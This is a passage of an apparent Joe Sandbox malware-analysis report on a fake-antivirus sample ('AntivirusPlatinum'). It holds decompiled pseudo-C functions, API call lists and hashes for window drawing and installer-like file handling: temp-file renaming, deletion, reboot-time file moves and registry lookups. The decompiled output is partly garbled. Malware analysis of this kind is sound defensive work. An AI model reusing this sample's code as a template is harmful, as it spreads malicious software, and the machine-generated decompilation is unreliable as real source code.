                                                                                                                                                              						if(E0040DA54( &_v1056, "STATIC") == 0 && (GetWindowLongA(_t35, 0xfffffff0) & 0x0000001f) == 0xe) {
                                                                                                                                                              							_t39 = SendMessageA(_t35, 0x173, 0, 0);
                                                                                                                                                              							if(_t39 != 0) {
                                                                                                                                                              								GetObjectA(_t39, 0x18,  &_v32);
                                                                                                                                                              								_t25 = E0040ACE4(_v24);
                                                                                                                                                              								SendMessageA(_t35, 0x172, 0, E0040ABDC(_t39, E0040ACA1(_v28), _t25));
                                                                                                                                                              								_t47 = _t39 -  *0x4192d0; // 0x72050a15
                                                                                                                                                              								if(_t47 != 0) {
                                                                                                                                                              									DeleteObject(_t39);
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_t15 = GetWindow(_t35, 2);
                                                                                                                                                              						_t35 = _t15;
                                                                                                                                                              						if(_t35 != _v8) {
                                                                                                                                                              							_a4 =  &(_a4->i);
                                                                                                                                                              							if(_t35 != 0) {
                                                                                                                                                              								continue;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					goto L12;
                                                                                                                                                              				}
                                                                                                                                                              			}














                                                                                                                                                              0x0040ba3f
                                                                                                                                                              0x0040ba46
                                                                                                                                                              0x0040bb26
                                                                                                                                                              0x0040bb26
                                                                                                                                                              0x0040ba52
                                                                                                                                                              0x0040ba58
                                                                                                                                                              0x0040ba5c
                                                                                                                                                              0x0040ba5e
                                                                                                                                                              0x0040ba63
                                                                                                                                                              0x0040bb24
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040ba69
                                                                                                                                                              0x0040ba71
                                                                                                                                                              0x0040ba8b
                                                                                                                                                              0x0040baa4
                                                                                                                                                              0x0040bac2
                                                                                                                                                              0x0040bac6
                                                                                                                                                              0x0040bacf
                                                                                                                                                              0x0040bad8
                                                                                                                                                              0x0040baf6
                                                                                                                                                              0x0040baf8
                                                                                                                                                              0x0040bafe
                                                                                                                                                              0x0040bb01
                                                                                                                                                              0x0040bb01
                                                                                                                                                              0x0040bafe
                                                                                                                                                              0x0040bac6
                                                                                                                                                              0x0040bb0a
                                                                                                                                                              0x0040bb10
                                                                                                                                                              0x0040bb15
                                                                                                                                                              0x0040bb17
                                                                                                                                                              0x0040bb1c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bb1c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bb15
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bb23

                                                                                                                                                              APIs
                                                                                                                                                              • GetWindow.USER32(?,00000005), ref: 0040BA52
                                                                                                                                                              • GetClassNameA.USER32(00000000,?,00000400), ref: 0040BA8B
                                                                                                                                                                • Part of subcall function 0040DA54: CompareStringA.KERNEL32(00000400,00001001,0040BAA2,000000FF,?,000000FF,0040BAA2,?,STATIC), ref: 0040DA6A
                                                                                                                                                              • GetWindowLongA.USER32 ref: 0040BAA9
                                                                                                                                                              • SendMessageA.USER32(00000000,00000173,00000000,00000000), ref: 0040BAC0
                                                                                                                                                              • GetObjectA.GDI32(00000000,00000018,?), ref: 0040BACF
                                                                                                                                                                • Part of subcall function 0040ACE4: GetDC.USER32(00000000), ref: 0040ACF0
                                                                                                                                                                • Part of subcall function 0040ACE4: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0040ACFF
                                                                                                                                                                • Part of subcall function 0040ACE4: ReleaseDC.USER32 ref: 0040AD0D
                                                                                                                                                                • Part of subcall function 0040ACA1: GetDC.USER32(00000000), ref: 0040ACAD
                                                                                                                                                                • Part of subcall function 0040ACA1: GetDeviceCaps.GDI32(00000000,00000058), ref: 0040ACBC
                                                                                                                                                                • Part of subcall function 0040ACA1: ReleaseDC.USER32 ref: 0040ACCA
                                                                                                                                                                • Part of subcall function 0040ABDC: GetDC.USER32(00000000), ref: 0040ABE8
                                                                                                                                                                • Part of subcall function 0040ABDC: CreateCompatibleDC.GDI32(00000000), ref: 0040ABF8
                                                                                                                                                                • Part of subcall function 0040ABDC: CreateCompatibleDC.GDI32(?), ref: 0040ABFF
                                                                                                                                                                • Part of subcall function 0040ABDC: GetObjectA.GDI32(?,00000018,?), ref: 0040AC0D
                                                                                                                                                                • Part of subcall function 0040ABDC: CreateCompatibleBitmap.GDI32(?,00000000,?), ref: 0040AC2F
                                                                                                                                                                • Part of subcall function 0040ABDC: SelectObject.GDI32(00000000,?), ref: 0040AC42
                                                                                                                                                                • Part of subcall function 0040ABDC: SelectObject.GDI32(?,00000000), ref: 0040AC4D
                                                                                                                                                                • Part of subcall function 0040ABDC: StretchBlt.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040AC6B
                                                                                                                                                                • Part of subcall function 0040ABDC: SelectObject.GDI32(00000000,?), ref: 0040AC75
                                                                                                                                                                • Part of subcall function 0040ABDC: SelectObject.GDI32(?,?), ref: 0040AC7D
                                                                                                                                                                • Part of subcall function 0040ABDC: DeleteDC.GDI32(00000000), ref: 0040AC86
                                                                                                                                                                • Part of subcall function 0040ABDC: DeleteDC.GDI32(?), ref: 0040AC8B
                                                                                                                                                                • Part of subcall function 0040ABDC: ReleaseDC.USER32 ref: 0040AC91
                                                                                                                                                              • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040BAF6
                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0040BB01
                                                                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 0040BB0A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object$Select$CompatibleCreateDeleteReleaseWindow$CapsDeviceMessageSend$BitmapClassCompareLongNameStretchString
                                                                                                                                                              • String ID: STATIC
                                                                                                                                                              • API String ID: 1367540300-1882779555
                                                                                                                                                              • Opcode ID: 677bcef28c02b9025152f1654d38757b0e1f9e66b029602011c5aca648503118
                                                                                                                                                              • Instruction ID: 07f9587c200ef160eeb3ad195d6a3061ef833dedfa1007c32b69e14aeef2bfc0
                                                                                                                                                              • Opcode Fuzzy Hash: 677bcef28c02b9025152f1654d38757b0e1f9e66b029602011c5aca648503118
                                                                                                                                                              • Instruction Fuzzy Hash: 4521AF32540604BBDB11AB60CD86FFF7A78EB45704F108136FA00B61D5DB78A952D6AD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E004066B3(intOrPtr __ecx) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				short _v32;
                                                                                                                                                              				struct tagMSG _v60;
                                                                                                                                                              				void* _t23;
                                                                                                                                                              				intOrPtr* _t25;
                                                                                                                                                              				short _t28;
                                                                                                                                                              				intOrPtr* _t30;
                                                                                                                                                              
                                                                                                                                                              				_v12 = __ecx;
                                                                                                                                                              				_v8 = GetTickCount();
                                                                                                                                                              				_t23 = GetTickCount() - _v8;
                                                                                                                                                              				while(_t23 <= 0x2710) {
                                                                                                                                                              					_t25 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                              					 *((intOrPtr*)( *_t25 + 0xe0))(_t25,  &_v16);
                                                                                                                                                              					if(_v16 != 4) {
                                                                                                                                                              						if(PeekMessageA( &_v60, 0, 0, 0, 0) != 0) {
                                                                                                                                                              							TranslateMessage( &_v60);
                                                                                                                                                              							DispatchMessageA( &_v60);
                                                                                                                                                              							GetMessageA( &_v60, 0, 0, 0);
                                                                                                                                                              						}
                                                                                                                                                              						_t23 = GetTickCount() - _v8;
                                                                                                                                                              						continue;
                                                                                                                                                              					}
                                                                                                                                                              					break;
                                                                                                                                                              				}
                                                                                                                                                              				__imp__#8( &_v32);
                                                                                                                                                              				_t28 = 3;
                                                                                                                                                              				_v32 = _t28;
                                                                                                                                                              				_t30 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                              				_v24 = 0x96;
                                                                                                                                                              				return  *((intOrPtr*)( *_t30 + 0xd8))(_t30, 0x3f, 2,  &_v32, 0);
                                                                                                                                                              			}













                                                                                                                                                              0x004066c2
                                                                                                                                                              0x004066c7
                                                                                                                                                              0x004066cc
                                                                                                                                                              0x00406729
                                                                                                                                                              0x004066db
                                                                                                                                                              0x004066e5
                                                                                                                                                              0x004066ef
                                                                                                                                                              0x00406701
                                                                                                                                                              0x00406707
                                                                                                                                                              0x00406711
                                                                                                                                                              0x0040671e
                                                                                                                                                              0x0040671e
                                                                                                                                                              0x00406726
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406726
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004066ef
                                                                                                                                                              0x00406731
                                                                                                                                                              0x00406739
                                                                                                                                                              0x0040673f
                                                                                                                                                              0x00406746
                                                                                                                                                              0x0040674d
                                                                                                                                                              0x00406761

                                                                                                                                                              APIs
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004066C5
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004066CA
                                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004066F9
                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00406707
                                                                                                                                                              • DispatchMessageA.USER32 ref: 00406711
                                                                                                                                                              • GetMessageA.USER32 ref: 0040671E
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00406724
                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00406731
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Message$CountTick$DispatchInitPeekTranslateVariant
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4242828014-0
                                                                                                                                                              • Opcode ID: 766a9df9442bdbeba9f0a7bc8735e7438eb22f29082fd7e0e4a68b4f8cac5761
                                                                                                                                                              • Instruction ID: c0585beae235016d48584d35ef6264e879dc9a629979c78930dffb86ffc294e5
                                                                                                                                                              • Opcode Fuzzy Hash: 766a9df9442bdbeba9f0a7bc8735e7438eb22f29082fd7e0e4a68b4f8cac5761
                                                                                                                                                              • Instruction Fuzzy Hash: 2521F7B1D00209AFDB00DBE4D988DEEBBBCEF48354F148866F106E7250D7789A45CB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E0040C5B9(void* __edi, void* __esi) {
                                                                                                                                                              				intOrPtr _t231;
                                                                                                                                                              				void* _t232;
                                                                                                                                                              				void* _t307;
                                                                                                                                                              				void* _t309;
                                                                                                                                                              
                                                                                                                                                              				L0:
                                                                                                                                                              				while(1) {
                                                                                                                                                              					L0:
                                                                                                                                                              					_t307 = __esi;
                                                                                                                                                              					if( *((intOrPtr*)(_t309 + 0x10)) != 1) {
                                                                                                                                                              						goto L103;
                                                                                                                                                              					}
                                                                                                                                                              					L88:
                                                                                                                                                              					__ebp - 0xc34 = GetTempPathA(0x400, __ebp - 0xc34);
                                                                                                                                                              					__ebp - 0xc34 = E004076C8(__ebp - 0xc34);
                                                                                                                                                              					 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
                                                                                                                                                              					_push(0);
                                                                                                                                                              					__ebx = "%s%s%d";
                                                                                                                                                              					while(1) {
                                                                                                                                                              						L90:
                                                                                                                                                              						__eax = __ebp - 0xc34;
                                                                                                                                                              						__eax = __ebp - 0x834;
                                                                                                                                                              						__eax =  *__edi(__ebp - 0x834, __ebx, __ebp - 0xc34,  *0x41409c);
                                                                                                                                                              						__esp = __esp + 0x14;
                                                                                                                                                              						__eax = __ebp - 0x834;
                                                                                                                                                              						__eax = __esi->i(__ebp - 0x834);
                                                                                                                                                              						if(__eax == 0xffffffff) {
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              						L89:
                                                                                                                                                              						_t127 = __ebp - 4;
                                                                                                                                                              						 *_t127 =  *(__ebp - 4) + 1;
                                                                                                                                                              						_push( *(__ebp - 4));
                                                                                                                                                              					}
                                                                                                                                                              					L91:
                                                                                                                                                              					__ebp - 0x834 = SetDlgItemTextA( *(__ebp + 8), 0x65, __ebp - 0x834);
                                                                                                                                                              					if( *(__ebp - 0x1c34) == 0) {
                                                                                                                                                              						while(1) {
                                                                                                                                                              							L152:
                                                                                                                                                              							_t231 = E0040B613(0x1000, _t307,  *((intOrPtr*)(_t309 + 0xc)), _t309 - 0x54dc, _t309 - 0x1c34, _t309 - 5, _t309 + 0xf);
                                                                                                                                                              							 *((intOrPtr*)(_t309 + 0xc)) = _t231;
                                                                                                                                                              							if(_t231 != 0) {
                                                                                                                                                              								_t307 = GetFileAttributesA;
                                                                                                                                                              								_t232 = _t309 - 0x1c34;
                                                                                                                                                              								 *(_t309 - 4) = _t309 - 0xb4dc;
                                                                                                                                                              								 *((intOrPtr*)(_t309 - 0xc)) = 6;
                                                                                                                                                              								goto L2;
                                                                                                                                                              							} else {
                                                                                                                                                              								break;
                                                                                                                                                              							}
                                                                                                                                                              							L4:
                                                                                                                                                              							while(lstrcmpiA(_t309 - 0x54dc,  *(0x4140b8 +  *(_t309 - 4) * 4)) != 0) {
                                                                                                                                                              								 *(_t309 - 4) =  *(_t309 - 4) + 1;
                                                                                                                                                              								if( *(_t309 - 4) < 0xd) {
                                                                                                                                                              									continue;
                                                                                                                                                              								} else {
                                                                                                                                                              									goto L152;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							if( *(_t309 - 4) > 0xc) {
                                                                                                                                                              								continue;
                                                                                                                                                              							}
                                                                                                                                                              							L8:
                                                                                                                                                              							switch( *((intOrPtr*)( *(_t309 - 4) * 4 +  &M0040CA61))) {
                                                                                                                                                              								case 0:
                                                                                                                                                              									L9:
                                                                                                                                                              									__eflags =  *((intOrPtr*)(_t309 + 0x10)) - 2;
                                                                                                                                                              									if( *((intOrPtr*)(_t309 + 0x10)) != 2) {
                                                                                                                                                              										goto L152;
                                                                                                                                                              									}
                                                                                                                                                              									L10:
                                                                                                                                                              									GetCurrentDirectoryA(0x400, _t309 - 0x434);
                                                                                                                                                              									E0040A477(_t309 - 0xc34, _t309 - 0x434);
                                                                                                                                                              									E004076C8(_t309 - 0xc34);
                                                                                                                                                              									E0040A5E2(_t309 - 0xc34, _t309 - 0x1c34);
                                                                                                                                                              									E00405BAD(_t309 - 0x40dc);
                                                                                                                                                              									E00405BDD(_t309 - 0x40dc, _t309 - 0xc34);
                                                                                                                                                              									E00403556(_t309 - 0x30d4);
                                                                                                                                                              									_push(0);
                                                                                                                                                              									_t300 = _t309 - 0x40dc;
                                                                                                                                                              									_t252 = E00405FAD(_t309 - 0x40dc, _t302, _t309 - 0x30d4);
                                                                                                                                                              									__eflags = _t252;
                                                                                                                                                              									if(_t252 == 0) {
                                                                                                                                                              										L27:
                                                                                                                                                              										E00405BCA(_t309 - 0x40dc);
                                                                                                                                                              										goto L152;
                                                                                                                                                              									} else {
                                                                                                                                                              										_t295 = "%s.%d.tmp";
                                                                                                                                                              										do {
                                                                                                                                                              											L12:
                                                                                                                                                              											SetFileAttributesA(_t309 - 0x30d4, 0);
                                                                                                                                                              											__eflags =  *((char*)(_t309 - 0x24c4));
                                                                                                                                                              											if( *((char*)(_t309 - 0x24c4)) == 0) {
                                                                                                                                                              												L18:
                                                                                                                                                              												_t257 = GetFileAttributesA(_t309 - 0x30d4);
                                                                                                                                                              												__eflags = _t257 - 0xffffffff;
                                                                                                                                                              												if(_t257 == 0xffffffff) {
                                                                                                                                                              													goto L26;
                                                                                                                                                              												}
                                                                                                                                                              												L19:
                                                                                                                                                              												_t261 = DeleteFileA(_t309 - 0x30d4);
                                                                                                                                                              												__eflags = _t261;
                                                                                                                                                              												if(_t261 != 0) {
                                                                                                                                                              													goto L26;
                                                                                                                                                              												} else {
                                                                                                                                                              													 *(_t309 - 4) =  *(_t309 - 4) & _t261;
                                                                                                                                                              													_push(_t261);
                                                                                                                                                              													goto L22;
                                                                                                                                                              													L22:
                                                                                                                                                              													wsprintfA(_t309 - 0x834, _t295, _t309 - 0x30d4);
                                                                                                                                                              													_t311 = _t311 + 0x10;
                                                                                                                                                              													_t266 = GetFileAttributesA(_t309 - 0x834);
                                                                                                                                                              													__eflags = _t266 - 0xffffffff;
                                                                                                                                                              													if(_t266 != 0xffffffff) {
                                                                                                                                                              														_t60 = _t309 - 4;
                                                                                                                                                              														 *_t60 =  *(_t309 - 4) + 1;
                                                                                                                                                              														__eflags =  *_t60;
                                                                                                                                                              														_push( *(_t309 - 4));
                                                                                                                                                              														goto L22;
                                                                                                                                                              													} else {
                                                                                                                                                              														_t269 = MoveFileA(_t309 - 0x30d4, _t309 - 0x834);
                                                                                                                                                              														__eflags = _t269;
                                                                                                                                                              														if(_t269 != 0) {
                                                                                                                                                              															_t270 = E00406EA5();
                                                                                                                                                              															__eflags = _t270;
                                                                                                                                                              															if(_t270 != 0) {
                                                                                                                                                              																MoveFileExA(_t309 - 0x834, 0, 4);
                                                                                                                                                              															}
                                                                                                                                                              														}
                                                                                                                                                              														goto L26;
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											L13:
                                                                                                                                                              											__eflags = E00406EA5() - 4;
                                                                                                                                                              											if(__eflags == 0) {
                                                                                                                                                              												goto L18;
                                                                                                                                                              											}
                                                                                                                                                              											L14:
                                                                                                                                                              											E00407300(_t300, __eflags, _t309 - 0x434, _t309 - 0x2034);
                                                                                                                                                              											E004076C8(_t309 - 0x2034);
                                                                                                                                                              											_t280 = E0040A384(_t300, _t309 - 0x434);
                                                                                                                                                              											 *((intOrPtr*)(_t309 - 0xc)) = _t280;
                                                                                                                                                              											__eflags = _t280 - 4;
                                                                                                                                                              											if(_t280 < 4) {
                                                                                                                                                              												L16:
                                                                                                                                                              												_t282 = E00407279(_t300, _t309 - 0x1c34, 0);
                                                                                                                                                              												__eflags = _t282;
                                                                                                                                                              												if(_t282 != 0) {
                                                                                                                                                              													goto L27;
                                                                                                                                                              												}
                                                                                                                                                              												L17:
                                                                                                                                                              												 *((char*)(_t309 + E0040A384(_t300, _t309 - 0x30d4) - 0x30d3)) = 0;
                                                                                                                                                              												E0040A289(_t300, _t309 - 0x34, 0, 0x1e);
                                                                                                                                                              												_push(0x14);
                                                                                                                                                              												_pop(_t287);
                                                                                                                                                              												 *((short*)(_t309 - 0x24)) = _t287;
                                                                                                                                                              												 *((intOrPtr*)(_t309 - 0x2c)) = _t309 - 0x30d4;
                                                                                                                                                              												 *((intOrPtr*)(_t309 - 0x30)) = 3;
                                                                                                                                                              												SHFileOperationA(_t309 - 0x34);
                                                                                                                                                              												goto L18;
                                                                                                                                                              											}
                                                                                                                                                              											L15:
                                                                                                                                                              											_t292 = E0040A384(_t300, _t309 - 0x2034);
                                                                                                                                                              											__eflags =  *((intOrPtr*)(_t309 - 0xc)) - _t292;
                                                                                                                                                              											if( *((intOrPtr*)(_t309 - 0xc)) > _t292) {
                                                                                                                                                              												goto L17;
                                                                                                                                                              											}
                                                                                                                                                              											goto L16;
                                                                                                                                                              											L26:
                                                                                                                                                              											_push(0);
                                                                                                                                                              											_t300 = _t309 - 0x40dc;
                                                                                                                                                              											_t259 = E00405FAD(_t309 - 0x40dc, _t302, _t309 - 0x30d4);
                                                                                                                                                              											__eflags = _t259;
                                                                                                                                                              										} while (_t259 != 0);
                                                                                                                                                              										goto L27;
                                                                                                                                                              									}
                                                                                                                                                              								case 1:
                                                                                                                                                              									L28:
                                                                                                                                                              									__eflags =  *(__ebp + 0x10);
                                                                                                                                                              									if( *(__ebp + 0x10) == 0) {
                                                                                                                                                              										__eax =  *0x41a81c;
                                                                                                                                                              										__eflags =  *0x41a81c;
                                                                                                                                                              										__ebx = __ebx & 0xffffff00 |  *0x41a81c == 0x00000000;
                                                                                                                                                              										__eflags = __bl;
                                                                                                                                                              										if(__bl == 0) {
                                                                                                                                                              											__eax = E0040A5E2(__eax, "<br>");
                                                                                                                                                              										}
                                                                                                                                                              										L31:
                                                                                                                                                              										__eflags =  *((char*)(__ebp - 5));
                                                                                                                                                              										if(__eflags == 0) {
                                                                                                                                                              											__esi = __ebp + 0xc;
                                                                                                                                                              											__edi = E0040B7BA(__ebp + 0xc, __eflags);
                                                                                                                                                              										} else {
                                                                                                                                                              											__edi = __ebp - 0x1c34;
                                                                                                                                                              										}
                                                                                                                                                              										__eflags = __bl;
                                                                                                                                                              										if(__bl == 0) {
                                                                                                                                                              											__esi = E0040A384(__ecx,  *0x41a81c);
                                                                                                                                                              										} else {
                                                                                                                                                              											__esi = 0;
                                                                                                                                                              										}
                                                                                                                                                              										E0040A384(__ecx, __edi) = __eax + __esi + 5;
                                                                                                                                                              										__eax = E0040A224( *0x41a81c, __eax);
                                                                                                                                                              										 *0x41a81c = __eax;
                                                                                                                                                              										__eflags = __bl;
                                                                                                                                                              										if(__bl != 0) {
                                                                                                                                                              											 *__eax = 0;
                                                                                                                                                              										}
                                                                                                                                                              										L39:
                                                                                                                                                              										__eax = E0040A5E2(__eax, __edi);
                                                                                                                                                              										__eflags =  *((char*)(__ebp - 5));
                                                                                                                                                              										if( *((char*)(__ebp - 5)) == 0) {
                                                                                                                                                              											__eax = E0040A205(__edi);
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              									goto L152;
                                                                                                                                                              								case 2:
                                                                                                                                                              									L41:
                                                                                                                                                              									__eflags =  *(__ebp + 0x10);
                                                                                                                                                              									if( *(__ebp + 0x10) == 0) {
                                                                                                                                                              										__ebp - 0x1c34 = SetWindowTextA( *(__ebp + 8), __ebp - 0x1c34); // executed
                                                                                                                                                              									}
                                                                                                                                                              									goto L152;
                                                                                                                                                              								case 3:
                                                                                                                                                              									L43:
                                                                                                                                                              									__eflags =  *(__ebp + 0x10);
                                                                                                                                                              									if( *(__ebp + 0x10) != 0) {
                                                                                                                                                              										goto L152;
                                                                                                                                                              									}
                                                                                                                                                              									L44:
                                                                                                                                                              									__eflags =  *0x419f92;
                                                                                                                                                              									if( *0x419f92 != 0) {
                                                                                                                                                              										goto L152;
                                                                                                                                                              									}
                                                                                                                                                              									L45:
                                                                                                                                                              									__eflags =  *(__ebp - 0x1c34) - 0x22;
                                                                                                                                                              									__esi = __ebp - 0x1c34;
                                                                                                                                                              									 *(__ebp - 0x434) = 0;
                                                                                                                                                              									if( *(__ebp - 0x1c34) == 0x22) {
                                                                                                                                                              										__esi = __ebp - 0x1c33;
                                                                                                                                                              									}
                                                                                                                                                              									__eax = E0040A384(__ecx, __esi);
                                                                                                                                                              									__eflags = __eax - 0x400;
                                                                                                                                                              									if(__eax >= 0x400) {
                                                                                                                                                              										goto L152;
                                                                                                                                                              									} else {
                                                                                                                                                              										L48:
                                                                                                                                                              										__al = __esi->i;
                                                                                                                                                              										__eflags = __al - 0x2e;
                                                                                                                                                              										if(__al != 0x2e) {
                                                                                                                                                              											L57:
                                                                                                                                                              											__eflags = __al - 0x5c;
                                                                                                                                                              											if(__al == 0x5c) {
                                                                                                                                                              												L51:
                                                                                                                                                              												__ebp - 0x434 = E0040A477(__ebp - 0x434, __esi);
                                                                                                                                                              												L52:
                                                                                                                                                              												__eax = __ebp - 0x434;
                                                                                                                                                              												__eax = E0040A3D9(__ecx, __ebp - 0x434, 0x22);
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              												if(__eax != 0) {
                                                                                                                                                              													__eflags =  *((char*)(__eax + 1));
                                                                                                                                                              													if( *((char*)(__eax + 1)) == 0) {
                                                                                                                                                              														 *__eax = 0;
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												__ebp - 0x434 = E0040A477(__ebx, __ebp - 0x434);
                                                                                                                                                              												__ebp - 0x434 = E0040B9B0(__esi, __ebp - 0x434); // executed
                                                                                                                                                              												__esi = GetDlgItem( *(__ebp + 8), 0x65);
                                                                                                                                                              												__ebp - 0x434 = SetWindowTextA(__esi, __ebp - 0x434); // executed
                                                                                                                                                              												__eax = SendMessageA(__esi, 0x143, 0, __ebx); // executed
                                                                                                                                                              												__eax = __ebp - 0x434;
                                                                                                                                                              												__eax = E0040A4E9(__ebx, __ebp - 0x434);
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              												if(__eax != 0) {
                                                                                                                                                              													__ebp - 0x434 = SendMessageA(__esi, 0x143, 0, __ebp - 0x434);
                                                                                                                                                              												}
                                                                                                                                                              												goto L152;
                                                                                                                                                              											}
                                                                                                                                                              											L58:
                                                                                                                                                              											__eflags = __al;
                                                                                                                                                              											if(__al == 0) {
                                                                                                                                                              												L60:
                                                                                                                                                              												__eax = __ebp - 0x10;
                                                                                                                                                              												__eax = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1, __ebp - 0x10);
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              												if(__eax == 0) {
                                                                                                                                                              													__ebp - 0xc = __ebp - 0x434;
                                                                                                                                                              													__eax = __ebp - 0x14;
                                                                                                                                                              													 *(__ebp - 0xc) = 0x400;
                                                                                                                                                              													RegQueryValueExA( *(__ebp - 0x10), "ProgramFilesDir", 0, __ebp - 0x14, __ebp - 0x434, __ebp - 0xc) = RegCloseKey( *(__ebp - 0x10));
                                                                                                                                                              												}
                                                                                                                                                              												__eflags =  *(__ebp - 0x434);
                                                                                                                                                              												if( *(__ebp - 0x434) != 0) {
                                                                                                                                                              													__eax = __ebp - 0x434;
                                                                                                                                                              													__eax = E0040A384(__ecx, __ebp - 0x434);
                                                                                                                                                              													__ecx = __ebp - 0x434;
                                                                                                                                                              													__ecx = __ebp - 0x433;
                                                                                                                                                              													__eflags =  *((char*)(__eax + __ecx)) - 0x5c;
                                                                                                                                                              													if( *((char*)(__eax + __ecx)) != 0x5c) {
                                                                                                                                                              														__ebp - 0x434 = E0040A5E2(__ebp - 0x434, "\\");
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												__edi = E0040A384(__ecx, __esi);
                                                                                                                                                              												__eax = __ebp - 0x434;
                                                                                                                                                              												__edi = __edi + E0040A384(__ecx, __ebp - 0x434);
                                                                                                                                                              												__eflags = __edi - 0x3ff;
                                                                                                                                                              												if(__edi < 0x3ff) {
                                                                                                                                                              													__ebp - 0x434 = E0040A5E2(__ebp - 0x434, __esi);
                                                                                                                                                              												}
                                                                                                                                                              												goto L52;
                                                                                                                                                              											}
                                                                                                                                                              											L59:
                                                                                                                                                              											__eflags = __esi->i - 0x3a;
                                                                                                                                                              											if(__esi->i == 0x3a) {
                                                                                                                                                              												goto L51;
                                                                                                                                                              											}
                                                                                                                                                              											goto L60;
                                                                                                                                                              										}
                                                                                                                                                              										L49:
                                                                                                                                                              										__eflags = __esi->i - 0x5c;
                                                                                                                                                              										if(__esi->i != 0x5c) {
                                                                                                                                                              											goto L57;
                                                                                                                                                              										}
                                                                                                                                                              										L50:
                                                                                                                                                              										__esi =  &(__esi->i);
                                                                                                                                                              										__eflags = __esi;
                                                                                                                                                              										goto L51;
                                                                                                                                                              									}
                                                                                                                                                              								case 4:
                                                                                                                                                              									L67:
                                                                                                                                                              									__eflags =  *0x419f8c - 1;
                                                                                                                                                              									__eflags = __eax - 0x419f8c;
                                                                                                                                                              									 *__edi =  *__edi + __ecx;
                                                                                                                                                              									__eflags =  *(__ebp + 5) & __cl;
                                                                                                                                                              									 *__eax =  *__eax + __al;
                                                                                                                                                              									__eflags =  *__eax;
                                                                                                                                                              								case 5:
                                                                                                                                                              									L72:
                                                                                                                                                              									__eax =  *(__ebp - 0x1c34);
                                                                                                                                                              									__eax =  *(__ebp - 0x1c34);
                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                              									if(__eax == 0) {
                                                                                                                                                              										L79:
                                                                                                                                                              										 *0x419edf = 0;
                                                                                                                                                              										 *0x419ede = 1;
